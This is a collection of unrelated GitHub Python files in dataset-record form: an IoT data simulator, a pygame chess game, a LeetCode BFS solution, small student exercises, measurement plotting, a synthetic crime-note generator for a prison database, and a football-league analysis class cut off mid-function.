Tree/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35467226503","text":"import requests\nimport argparse\nimport jsonpickle\nimport random\nimport tqdm\nfrom time import sleep\n\nparser = argparse.ArgumentParser(description='Send simulated data to a thingsIO account')\nparser.add_argument('--endpoint', default='http://34.120.7.225/store')\nparser.add_argument('--num', default=1000, type=int, help='number of simulated requests')\nparser.add_argument('--delay', default=1, type=int, help='delay in seconds per round')\nparser.add_argument('--schema_file', default=\"schema2.json\", help='path to the schema json')\nparser.add_argument('--uuid_file', default=\"uids.txt\", help='path to the uuids')\n\nargs = parser.parse_args()\n\nAPI_KEYS = []\nwith open(args.uuid_file, \"r\") as fp:\n API_KEYS = [i.rstrip() for i in fp.readlines()]\n\nURL = args.endpoint\nNUM_REQ = args.num\nSCHEMA = None\n\n\nwith open(args.schema_file, 'r') as fp:\n SCHEMA = jsonpickle.decode(fp.read())\n\nif SCHEMA is None:\n exit(-1)\n\ndef getRandom(s):\n if s == \"numeric\":\n return random.uniform(0,500)\n elif s == \"location\":\n return \"{},{}\".format(random.uniform(-85,85), random.uniform(-170,170))\n else:\n return \"\"\n\n\nheaders = {'content-type': 'application/json'}\n\nfor i in tqdm.trange(NUM_REQ):\n req = dict(SCHEMA)\n for k in SCHEMA.keys():\n req[k] = getRandom(SCHEMA[k][\"type\"])\n for u in API_KEYS:\n r = requests.post(\"{}/{}\".format(URL, u), data=jsonpickle.encode(req), headers=headers)","repo_name":"sanskarkatiyar/thingsIO","sub_path":"test/batch_sim.py","file_name":"batch_sim.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21738289771","text":"import pygame as pg\r\nimport chess_engine\r\n\r\nWIDTH = HEIGHT = 512\r\nDIMENSION = 8\r\nSQUARE_SIZE = HEIGHT // DIMENSION\r\nMAX_FPS = 15\r\nIMAGES = {}\r\n\r\n\r\ndef load_images():\r\n pieces = ['wp', 'wR', 'wN', 'wB', 'wK', 'wQ', 'bp', 'bR', 'bN', 'bB', 'bK', 'bQ']\r\n for piece in pieces:\r\n IMAGES[piece] = pg.image.load('images/' + piece + '.png'), (SQUARE_SIZE, SQUARE_SIZE) # set image size\r\n\r\n\r\n\"\"\" main function \"\"\"\r\n\r\n\r\ndef main():\r\n pg.init()\r\n # pygame documentation\r\n screen = pg.display.set_mode((HEIGHT, WIDTH))\r\n clock = pg.time.Clock()\r\n screen.fill(pg.Color('white'))\r\n gs = chess_engine.GameState()\r\n valid_moves = gs.get_valid_moves()\r\n move_made = False\r\n load_images()\r\n run_game = True\r\n sq_Selected = ()\r\n player_clicks = []\r\n while run_game:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n run_game = False\r\n elif event.type == pg.MOUSEBUTTONDOWN:\r\n location = pg.mouse.get_pos() # x, y mouse location\r\n col = location[0] // SQUARE_SIZE # x\r\n row = location[1] // SQUARE_SIZE # y\r\n if sq_Selected == (row, col): # if user clicked the same square twice\r\n sq_Selected = () # deselect square\r\n player_clicks = []\r\n else:\r\n sq_Selected = (row, col)\r\n player_clicks.append(sq_Selected)\r\n if len(player_clicks) == 2:\r\n move = chess_engine.Move(player_clicks[0], player_clicks[1], gs.board)\r\n print(move.get_chess_notation())\r\n # if move in valid_moves:\r\n for each in range(len(valid_moves)):\r\n if move == valid_moves[each]:\r\n gs.make_move(move)\r\n move_made = True\r\n sq_Selected = ()\r\n player_clicks = []\r\n if not move_made:\r\n player_clicks = [sq_Selected]\r\n\r\n elif event.type == pg.KEYDOWN:\r\n if event.key == pg.K_z:\r\n gs.undo_move()\r\n move_made = True\r\n if move_made:\r\n valid_moves = gs.get_valid_moves()\r\n move_made = False\r\n\r\n drawGameState(screen, gs)\r\n clock.tick(MAX_FPS)\r\n pg.display.flip()\r\n\r\n\r\n\"\"\" Draw board and pieces \"\"\"\r\n\r\n\r\ndef drawGameState(screen, gs):\r\n drawboard(screen)\r\n drawpieces(screen, gs.board)\r\n\r\n\r\ndef drawboard(screen):\r\n colors = [pg.Color('white'), pg.Color('brown')]\r\n for row in range(DIMENSION):\r\n for column in range(DIMENSION):\r\n color = colors[((row + column) % 2)]\r\n pg.draw.rect(screen, color, pg.Rect(row * SQUARE_SIZE, column * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\r\n\r\n\r\ndef drawpieces(screen, board):\r\n for row in range(DIMENSION):\r\n for column in range(DIMENSION):\r\n piece = board[column][row]\r\n if piece != '--':\r\n pg_rect = pg.Rect(row * SQUARE_SIZE, column * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE)\r\n screen.blit(IMAGES[piece][0], pg_rect)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bazuly/ChessGame","sub_path":"chess_main.py","file_name":"chess_main.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565685314","text":"'''\n\nDescription:\n\nIn a given grid, each cell can have one of three values:\n\nthe value 0 representing an empty cell;\nthe value 1 representing a fresh orange;\nthe value 2 representing a rotten orange.\nEvery minute, any fresh orange that is adjacent (4-directionally) to a rotten orange becomes rotten.\n\nReturn the minimum number of minutes that must elapse until no cell has a fresh orange. If this is impossible, return -1 instead.\n\n \n\nExample 1:\n\nInput: [[2,1,1],[1,1,0],[0,1,1]]\nOutput: 4\n\n\n\nExample 2:\n\nInput: [[2,1,1],[0,1,1],[1,0,1]]\nOutput: -1\nExplanation: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 4-directionally.\n\n\n\nExample 3:\n\nInput: [[0,2]]\nOutput: 0\nExplanation: Since there are already no fresh oranges at minute 0, the answer is just 0.\n \n\nNote:\n\n1 <= grid.length <= 10\n1 <= grid[0].length <= 10\ngrid[i][j] is only 0, 1, or 2.\n\n'''\n\n\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n \n # Constant for grid state\n EMPTY = 0\n FRESH = 1\n ROTTEN = 2\n \n # Get dimension of grid\n h, w = len(grid), len(grid[0])\n \n # record for fresh oranges\n fresh_count = 0\n \n # record for position of initial rotten oranges\n rotten_grid = [] \n \n for y in range(h):\n for x in range(w):\n \n if grid[y][x] == FRESH :\n fresh_count += 1\n \n elif grid[y][x] == ROTTEN:\n rotten_grid.append( (y, x, 0) )\n \n \n if fresh_count == 0:\n # Quick response for no fresh organe\n return 0\n \n \n traversal_queue = deque( rotten_grid )\n \n # Launch BFS from rotten grid\n while traversal_queue:\n \n cur_y, cur_x, time_stamp = traversal_queue.popleft()\n \n if 0 <= cur_y < h and 0 <= cur_x < w and grid[cur_y][cur_x] in (FRESH, ROTTEN):\n \n if grid[cur_y][cur_x] == FRESH:\n \n # This orange is rotten on current iteration\n # update fresh count\n fresh_count -= 1\n\n # Mark as visited with time stamp\n grid[cur_y][cur_x] = -time_stamp\n\t\t\t\t \n\t\t\t\t\t# update minute\n minute = time_stamp\n \n if ( grid[cur_y][cur_x] < 0 ) or ( time_stamp == 0 ):\n \n # BFS with new time stamp\n traversal_queue.append( (cur_y-1, cur_x, time_stamp+1) )\n traversal_queue.append( (cur_y+1, cur_x, time_stamp+1) )\n traversal_queue.append( (cur_y, cur_x-1, time_stamp+1) )\n traversal_queue.append( (cur_y, cur_x+1, time_stamp+1) )\n \n # ----------------------------------------------------------------\n \n if fresh_count == 0:\n # All orange is rotten finally\n return minute\n else:\n # Some orange still keep fresh\n return -1\n \n\n\n# m : the height of grid\n# n : the width of grid\n\n## Time Complexity: O( m*n )\n#\n# The overhead in time is the cost of BFS traversal, which is of O( m*n )\n\n## Space Complexity: O( m*n )\n#\n# The overhead in space is the storage for traversal queue, which is of O( m*n )\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'grid')\n\ndef test_bench():\n\n test_data = [\n TestEntry( grid = [[2,1,1],[1,1,0],[0,1,1]] ),\n TestEntry( grid = [[2,1,1],[0,1,1],[1,0,1]] ),\n TestEntry( grid = [[0,2]] ),\n TestEntry( grid = [[1,2,2]] ),\n TestEntry( grid = [[1,1,1,1],[2,1,1,2],[1,1,1,1]] ),\n ]\n\n # expected output:\n '''\n 4\n -1\n 0\n 1\n 2\n '''\n\n for t in test_data:\n\n print( Solution().orangesRotting( grid = t.grid ) )\n \n return\n\n\n\n\nif __name__ == '__main__':\n\n test_bench() \n\n","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0994_Rotting Oranges/by_bfs.py","file_name":"by_bfs.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10644164744","text":"# Program Name: Cities\n# Program Author: James Allen\n# Class: Computer Programming ITSE 1302 7P1\n# Description: This program populates a list a sorts descending\n# declare list\ncity = []\n# loop populating the list with setinel control\nname = input(\"Enter City Name: \")\nwhile name != \"XXX\":\n\tcity.append(name)\n\tname = input(\"Enter City Name: \")\n# sort the list descending\ncity.sort(reverse=True)\nprint(\"Sorted Cities (descending): \")\n# print list elements individually\nfor x in city:\n\tprint(x)","repo_name":"jallen128652/Python","sub_path":"Module6/Cities/Cities/Cities.py","file_name":"Cities.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31960104041","text":"\"\"\"\nFile: coin_flip_runs.py\nName: Chance\n-----------------------\nThis program should simulate coin flip(s)\nwith the number of runs input by users.\nA 'run' is defined as consecutive results\non either 'H' or 'T'. For example, 'HHHHHTHTT'\nis regarded as a 2-run result.\nYour program should stop immediately after your\ncoin flip results reach the number of runs!\n\"\"\"\n\nimport random as r\n\n\ndef main():\n\t\"\"\"\n\t(1) end_runs is end condition\n\t(2) random string and meet our end condition\n\t(3) print random string\n\t\"\"\"\n\tprint(\"Let;s flip a coin!\")\n\tend_runs = int(input('Number of runs: '))\n\n\t# Initial Condition\n\truns = 0\n\ton_check = 0\n\tpre_coin = 2\n\tans = ''\n\n\twhile True:\n\t\t# random coin 0/1\n\t\tcoin = r.randrange(0, 2)\n\n\t\t# ans\n\t\tif coin:\n\t\t\tans += 'H'\n\t\telse:\n\t\t\tans += 'T'\n\n\t\t# runs\n\t\tif coin == pre_coin:\n\t\t\tif not on_check:\n\t\t\t\truns += 1\n\t\t\t\ton_check = 1\n\t\telse:\n\t\t\ton_check = 0\n\t\tpre_coin = coin\n\n\t\t# EXIT\n\t\tif runs == end_runs:\n\t\t\tbreak\n\tprint(ans)\n\n\n# ---- DO NOT EDIT CODE BELOW THIS LINE ---- #\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"cwchang18/StanCode","sub_path":"SC101/HW00/coin_flip_runs.py","file_name":"coin_flip_runs.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12274904613","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport os\nimport json\nimport glob\n\ndata_dir = '../data'\nsave_dir = '../graph'\njson_dir = '../json'\n\ndef main():\n os.chdir(data_dir)\n filelists = glob.glob('*.csv')\n for file in filelists:\n if not os.path.isdir(file) and file[-4:]==\".csv\":\n csv2png(file)\n\ndef csv2png(file):\n df = pd.read_csv(file, index_col=0)\n for i, dat in df.iteritems():\n plt.scatter(df.index, dat, label = i)\n plt.title(file)\n plt.legend()\n plt.savefig(os.path.join(save_dir, file+\".\"))\n plt.close()\n\nif __name__ == '__main__':\n main()\n\ndef get_json_info():\n json_str = {\n 'test_name' : 'angular_profile',\n 'test_type' : 'verification',\n 'test_type' : 'Chiba',\n 'test_data' : '2020/01/01',\n 'test_result' : {\n 'result_type' : 'graph',\n 'x-vals' : getVals('xaxis'),\n 'y-vals' : getVals('yaxis'),\n 'x-label' : 'angle[deg]',\n 'y-label' : 'intensity[mV]'\n }\n }\n return json_str\n\n\ndef getVals(axis):\n os.chdir('/mnt/c/Users/yuya9/mylab/LED_Measurements/data/')\n data_dir = glob.glob('*.csv')\n NumF = len(data_dir)\n xval = []\n yval = []\n for i in range(0, NumF):\n cw_data = pd.read_csv(data_dir[i])\n x_data = pd.Series(cw_data['deg'])\n y_data = pd.Series(cw_data['cw'])\n \n for x, y in zip(x_data, y_data):\n xval.append(x)\n yval.append(y)\n #string = f'{axis}'\n if axis == 'xaxis':\n return xval\n elif axis == 'yaxis':\n return yval\n else:\n raise ValueError(\"Argument should be 'xaxis' or 'yaxis'\")\n\ndef str_json_info():\n json_str = get_json_info()\n os.chdir('/mnt/c/Users/yuya9/mylab/LED_Measurements/data/')\n data_dir = glob.glob('*.csv')\n NumF = len(data_dir)\n for i in range(0, NumF):\n data_json = os.path.splitext(os.path.basename(data_dir[i]))[0]\n with open(os.path.join(json_dir,data_json+'.json'), 'w') as f:\n json.dump(json_str, f, indent=4)\n print(\"JSON file is created.\")\n print(json_str)\n\n \nif __name__ == \"__main__\":\n str_json_info()\n\n","repo_name":"icehap/Flasher_Measurements","sub_path":"LED_Measurements.py","file_name":"LED_Measurements.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36671684828","text":"from torch import Tensor\n\n\ndef right_broadcast_like(src: Tensor, dst: Tensor) -> Tensor:\n num = len(dst.shape) - len(src.shape)\n out = src\n if num > 0:\n for _ in range(num):\n out = out.unsqueeze(-1)\n return out\n","repo_name":"TinyZeaMays/JJF","sub_path":"lib/utils/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71490240833","text":"\"\"\"\n问题描述\n\n每一本正式出版的图书都有一个ISBN号码与之对应,ISBN码包括9位数字、1位识别码和3位分隔符,\n其规定格式如“x-xxx-xxxxx-x”,其中符号“-”是分隔符(键盘上的减号),最后一位是识别码,\n\n例如0-670-82162-4就是一个标准的ISBN码。ISBN码的首位数字表示书籍的出版语言,\n\n例如0代表英语;第一个分隔符“-”之后的三位数字代表出版社,例如670代表维京出版社;\n\n第二个分隔之后的五位数字代表该书在出版社的编号;最后一位为识别码。\n\n识别码的计算方法如下:\n   首位数字乘以1加上次位数字乘以2……以此类推,用所得的结果mod 11,所得的余数即为识别码,\n 如果余数为10,则识别码为大写字母X。例如ISBN号码0-670-82162-4中的识别码4是这样得到的:\n 对067082162这9个数字,从左至右,分别乘以1,2,…,9,再求和,即0×1+6×2+……+2×9=158,\n 然后取158 mod 11的结果4作为识别码。\n  \n 编写程序判断输入的ISBN号码中识别码是否正确,如果正确,则仅输出“Right”;\n 如果错误,则输出是正确的ISBN号码。\n\n输入格式\n\n  输入只有一行,是一个字符序列,表示一本书的ISBN号码(保证输入符合ISBN号码的格式要求)。\n\n输出格式\n\n  输出一行,假如输入的ISBN号码的识别码正确,那么输出“Right”,\n\t否则,按照规定的格式,输出正确的ISBN号码(包括分隔符“-”)。\n\n解题思路:\n熟悉正则可以考虑使用正则表达式,\n\n由于题目保证了格式,不需要了正则了\n\n只检验校验码即可\n\"\"\"\nISBN=input().strip()\nm,n,p,code=ISBN.split('-')\n\n\n# 列表为包含9个数字\n# 返回校验码\ndef chkCode(lst):\n\tll=len(lst)\n\ts=0\n\tfor inx in range(ll):\n\t\ts+=(inx+1)*lst[inx]\n\tif s%11==10:\n\t\treturn 'X'\n\telse:\n\t\treturn str(s%11)\n\n# 构造列表\nlst=[]\nlst.append(m)\nlst.extend([v for v in n])\nlst.extend([j for j in p])\nlst=list(map(int,lst))\n\ngetcode=chkCode(lst)\nif getcode==code:\n\tprint(\"Right\")\nelse:\n\tprint(ISBN[:-1]+getcode)\n\n","repo_name":"Devinwon/master","sub_path":"coding-exercise/CCF/201312-2.py","file_name":"201312-2.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26473553262","text":"import utils.parse_config as u\nimport utils.database as db\nimport curPath\nimport utils.save_to_json as sava_to_json\nimport random\ndef save_to_txt(rate_his, file_path):\n with open(file_path, 'w') as f:\n for rate in rate_his:\n f.write(\"%s \\n\" % rate)\nconfig = u.ReadConfig()\n\nthieves=config.get_tablename(\"thieves_name\")\nfraudsters=config.get_tablename(\"fraudsters_name\")\nposition=config.get_tablename(\"position_name\")\ndrug=config.get_tablename(\"drug_name\")\ntraffic=config.get_tablename(\"traffic_name\")\nrape=config.get_tablename(\"rape_name\")\nrob=config.get_tablename(\"rob_name\")\ndamage=config.get_tablename(\"damage_name\")\nintentkill=config.get_tablename(\"intentkill_name\")\ntables=[thieves,fraudsters,position,drug,traffic,rape,rob,damage,intentkill]\nprint(tables)\ncon = db.DB()\ndata_json=[]\ndef position_note():\n a=[\"公职人员,\",\"公务员,\",\"某县县长\",\"村长,\",\"省委书记,\",\"省长,\",\"某市文化馆馆长,\",\"烟草局局长,\"]\n money=[\"50万元\",\"100万元\",\"2亿\",\"2000万元\",\"1000多万\",\"500万\",\"300万元\",\"80万元\",\"300多万\",\"800万元\",\"1200万元\",\"1.5亿\"]\n rea=[\"涉及金额{}\".format(random.choice(money)),\"贪污{}\".format(random.choice(money)),\"滥用公职,以权谋私,长期贪污腐败\"]\n return random.choice(rea)\ndef drup_note(type):\n rea=[type,\"因其家人从事贩毒,\",\"因从事毒品的贩卖,\",\"因长期从事毒品的贩卖\",\"因长期吸毒,\",\"因有很大毒瘾,\",\"因长期购买并使用毒品,\",\"因吸食毒品,\",\"因长期吸食毒品,\"]\n p=\"被捕入狱\"\n return random.choice(rea)+p\ndef rape_note():\n tool=[\"单身,\",\"离婚,\",\"未婚,\",]\n xing=[\"王\",\"张\",\"陈\",\"赵\",\"雷\",\"孙\",\"李\",\"任\",]\n thing=[\"将受害人{}某强奸,\",\"将受害人{}某强奸,\",\"强奸{}某,\",\"强奸{}某某,\",\"强奸未遂,\"]\n a=[\"强吻,猥亵妇女,\",\"强吻,猥亵{}某,\",\"猥亵{}某某,\",]\n type=\"犯强奸罪\"\n return random.choice(tool)+random.choice(thing).format(random.choice(xing))+\"还多次\"+random.choice(a)+type\ndef rob_note():\n tool = [\"无生活来源,\",\"不务正业,\",\"好吃懒做,\",\"游手好闲,\",\"\",]\n thing=[\"手机\",\"名贵手表\",\"包包\",\"现金\",\"名贵首饰\",\"项链\",\"金首饰\",\"金项链\",]\n mod = [\"持刀抢劫他人{},\", \"尾随并抢劫他人{},\",\"\"]\n type=\"犯抢劫罪\"\n return random.choice(tool)+random.choice(mod).format(random.choice(thing))+type\ndef kill_note():\n tool=[\"自己的亲生母亲\",\"他人\",\"同学\",\"朋友\",\"同村人\",\"老板\",\"上司\",\"同事\",\"亲人\"]\n mod=[\"拿刀砍死{}\",\"拿刀将{}杀害\",\"与{}发生争执,并将其杀害\",\"将{}杀害\",\"与{}发生冲突,于是杀人\",\"将{}杀害,并将尸体藏匿\",\"将{}勒死杀害\"]\n return random.choice(mod).format(random.choice(tool))\ndef damege_note():\n tool=[\"具有精神病态,\",\"具有一定精神病态\",\"具有原发性精神病态,\",\"具有继发性精神病态,\"]\n mod=\"犯故意伤害罪\"\n return random.choice(tool)+mod\ndef fraudsters_note():\n p=[\"电话\",\"网络\"]\n tool=[\"实施{}诈骗\",]\n return \"从事诈骗活动,\"+random.choice(tool).format(random.choice(p))\ndef thieves_note():\n rea=[\"家庭教养方式不足,\",\"父母教养方式存在问题,\",\"缺乏父母管教,\",\"母亲教养不足,\",\"父亲教养不足,\",]\n p=[\"加入盗窃团伙,实施盗窃\",\"半夜潜入房间实施盗窃\",\"长期从事偷窃,以盗窃为生\",\"趁他人不备盗窃,犯盗窃罪\",]\n return random.choice(rea)+random.choice(p)\nif __name__ == '__main__':\n name_set=set()\n for i in range(len(tables)):\n table=tables[i] # 确定表名\n # 查看这个表多少数据\n sql = \"select * from {}\".format(table)\n data=con.select(sql)\n print(len(data))\n con.add(\"alter table {} add note text(50);\".format(table)) #添加列\n if table==\"thieves\":\n qid_start=0\n\n #处理盗窃\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n age=adata[4]\n note=name+\",\"+str(age)+\"岁,\"+thieves_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"]=qid_start+int(id)\n adata_json[\"type\"]=table\n adata_json[\"note\"]=note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"fraudsters\":\n qid_start = 1000\n #处理诈骗表\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[4]\n age=adata[6]\n money=random.randint(10000,1000000)\n note=name+\",\"+str(age)+\"岁,\"+fraudsters_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"position\":\n qid_start = 2000\n #处理职务犯\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[3]\n type=adata[9]\n age=adata[10]\n note=\"职务犯\"+name+\",\"+str(age)+\"岁,\"+type+position_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"drug\":\n qid_start = 3000\n #处理贩毒\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n age=adata[3]\n edu=adata[4]\n type=adata[5]\n note=str(age)+\"岁,\"+edu+\"文化程度,\"+drup_note(type)\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n if table==\"traffic\":\n qid_start = 4000\n #处理交通肇事\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n note=name+\",\"+\"犯交通肇事逃逸罪,安全驾驶态度较差\"\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"rape\":\n qid_start = 5000\n #处理强奸\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n age = adata[4]\n note=name+\",\"+str(age)+\"岁,\"+rape_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"rob\":\n qid_start = 6000\n #处理抢劫\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n age = adata[4]\n note=name+\",\"+str(age)+\"岁,\"+rob_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table == \"damage\":\n qid_start = 7000\n # 故意伤害\n for j in range(1000):\n adata = data[j]\n id = adata[0]\n name = adata[2]\n age = adata[4]\n type = adata[7]\n note = name + \",\" + str(age) + \"岁,\" +damege_note()\n # print(desc)\n sql_updata = \"update {} set note=\\\"{}\\\" where id={};\".format(table, note, int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table == \"intentkill\":\n qid_start = 8000\n # 故意杀人\n for j in range(1000):\n adata = data[j]\n id = adata[0]\n name = adata[2]\n age = adata[4]\n type = adata[7]\n note = name + \",\" + str(age) + \"岁,\" + type+\",\"+kill_note()\n # print(desc)\n sql_updata = \"update {} set note=\\\"{}\\\" where id={};\".format(table, note, int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n sava_to_json.save_json(data_json,curPath.mainPath()+\"/bert/data/data.json\")\n\n save_to_txt(name_set,curPath.mainPath()+\"/bert/stopwords/姓名年龄岁.txt\") #bert里面进行用的时候,去掉这些姓名等词语,所以提前保存停止词","repo_name":"renchaojun/prison","sub_path":"produce_note.py","file_name":"produce_note.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30421405266","text":"from pandas import merge, Series, DataFrame\n\nfrom dao.dao import DAO\nfrom league import League\nfrom util.util import mean_deviation\n\nclass LeagueAnalysis:\n\n\tdef __init__(self, league):\n\t\tself.league = league\n\n\tdef points_corr(self, df_tables, method=\"kendall\", n_head=None, precision=3):\n\t\t'''\n\t\tArgs:\n\t\t\tdf_tables: list of table dataframes\n\t\t\tmethod: ranking correlation method: 'spearman' or 'kendall'\n\t\t\tn_head: n firsts position for the table, if None all position will be considered\n\n\t\tReturns:\n\t\t\tan array with the correlations of team points between table dataframes (df_tables) for \n\t\t\tthe firsts positions clubs.\n\t\t'''\n\n\t\tif n_head is None:\n\t\t\tn_head = len(self.league.teams())\n\n\t\tcorrelations = []\n\n\t\tfor i in range(len(df_tables) - 1):\n\t\t\tdf1 = df_tables[i]\n\t\t\tdf2 = df_tables[i + 1]\n\t\t\t\n\t\t\tpoints1, points2 = self.paired_points(df1=df1, df2=df2, n_head=n_head)\n\t\t\tcorr = points1.corr(points2, method=method)\n\t\t\tcorrelations.append(corr)\n\t\t\n\t\treturn [float(round(corr, precision)) for corr in correlations]\n\n\tdef paired_points(self, df1, df2, n_head):\n\t\tdf1_points = df1.head(n_head)['Points'].tolist()\n\t\tdf1_teams = df1.head(n_head)[\"Team\"].tolist()\n\n\t\tdf2_points = []\n\n\t\tfor team in df1_teams:\n\t\t\tmapping_rank1_rank2 = df2[df2[\"Team\"] == team]['Points'].item()\n\t\t\tdf2_points.append(mapping_rank1_rank2)\n\n\t\treturn Series(df1_points), Series(df2_points)\n\n\tdef range_points_spread(self, dates, top_n_clubs):\n\t\trange_points_spread_list = []\n\t\tfor date in dates:\n\t\t\ttable = self.league.table(to_date=date).sort_values(by=\"Points\", ascending=False)\n\t\t\tpoints = table.head(top_n_clubs)[\"Points\"].tolist()\n\t\t\trange_points_spread_list.append(points[0] - points[-1])\n\n\t\treturn range_points_spread_list\n\n\tdef home_away_match_performance(self, team):\n\t\t'''\n\t\tArgs:\n\t\t\tteam:\n\t\t\t\tcompute performance for this team\n\n\t\tReturns:\n\t\t\thow frequent is for a team to win in away match the same points \n\t\t\tas in home match, aiganst the same team\n\t\t'''\n\n\t\tmatches = self.league.home_away_matches(team=team)\n\n\t\tstability_series = matches.apply(lambda row: self.home_away_stability(row), axis=1)\n\t\tstability = stability_series.value_counts()[True]\n\n\t\treturn stability\n\n\tdef home_away_stability(self, row):\n\t\tif row[\"TeamHG\"] > row[\"AigAG\"]:\n\t\t\tpoints_home = 3\n\t\telif row[\"TeamHG\"] == row[\"AigAG\"]:\n\t\t\tpoints_home = 1\n\t\telse:\n\t\t\tpoints_home = 0\n\n\t\tif row[\"TeamAG\"] > row[\"AigHG\"]:\n\t\t\tpoints_away = 3\n\t\telif row[\"TeamAG\"] == row[\"AigHG\"]:\n\t\t\tpoints_away = 1\n\t\telse:\n\t\t\tpoints_away = 0\n\n\t\treturn points_home == points_away\n\n\tdef match_level(self, team):\n\t\tmatches = self.league.home_away_matches(team=team)\n\t\tpoints = self.league.points()\n\n\t\tmatch_points = merge(left=matches, right=points, left_on=\"Aiganst\", right_on=\"Team\", how='inner')\n\n\t\tprint()\n\t\tprint(points[[\"Team\", \"Points\"]])\n\t\tprint(match_points)\n\n\t\tvictories = self.oponnet_defeated_points(match_points)\n\t\tprint(round(victories[\"home\"].mean()), (victories[\"home\"]).tolist())\n\t\t\n\t\tties = self.oponnet_tied_points(match_points)\n\t\tprint(round(ties[\"home\"].mean()), (ties[\"home\"]).tolist())\n\t\t\n\t\tlooses = self.oponnet_wins_points(match_points)\n\t\tprint(round(looses[\"home\"].mean()), (looses[\"home\"]).tolist())\n\t\t\n\t\treturn None\n\n\n\tdef oponnet_defeated_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] > match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] > match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": 